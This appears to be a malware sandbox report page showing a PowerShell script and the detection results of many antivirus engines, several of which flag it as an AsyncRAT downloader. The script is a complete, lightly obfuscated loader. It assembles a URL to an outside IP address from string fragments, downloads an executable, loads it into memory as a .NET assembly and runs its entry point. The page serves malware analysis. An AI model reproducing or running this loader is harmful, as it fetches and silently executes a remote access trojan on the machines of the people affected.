Static | ZeroBOX
No static analysis available.
function HxRnF-MwVy {
Add-Type -AssemblyName System.Net
return New-Object System.Net.WebClient
function ZqLpS-KeWd {
$dU = @('http', '://', '88', '.', '214', '.', '48', '.', '26', '/tpnl98/', 'ret.exe')
return ($dU -join '')
function BlKqD-XoVi {
param([string]$eB)
$tM = HxRnF-MwVy
return $tM.DownloadData($eB)
function JyEzC-QhTf {
param([byte[]]$uO)
return [System.Reflection.Assembly]::Load($uO)
function VrLnx-TyJp {
param([System.Reflection.Assembly]$sV)
$aH = $sV.EntryPoint
if ($aH) {
$aH.Invoke($null, @())
$nK = ZqLpS-KeWd
$fB = BlKqD-XoVi -eB $nK
$gW = JyEzC-QhTf -uO $fB
VrLnx-TyJp -sV $gW
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX powershell.downloader.asyncrat
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericKD.76282900
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong TrojanDownloader/PS.Agent.cn
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 PowerShell/TrojanDownloader.Agent.LYW
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.PowerShell.Agent.gen
BitDefender Trojan.GenericKD.76282900
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.76282900
Tencent Win32.Trojan-Downloader.Downloader.Hajl
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Trojan.GenericKD.76282900
TrendMicro Clean
CMC Clean
Emsisoft Trojan.GenericKD.76282900 (B)
Ikarus Trojan-Downloader.PowerShell.Agent
GData Trojan.GenericKD.76282900
Jiangmin Clean
Varist ABDownloader.FAIV
Avira Clean
Antiy-AVL Trojan[Downloader]/PowerShell.AsyncRAT
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D48BFC14
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft TrojanDownloader:PowerShell/AsyncRAT.YTS!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Agent/PS!8.1250D (TOPIS:E0:I8VBzmz4OfT)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
alibabacloud Clean
No IRMA results available.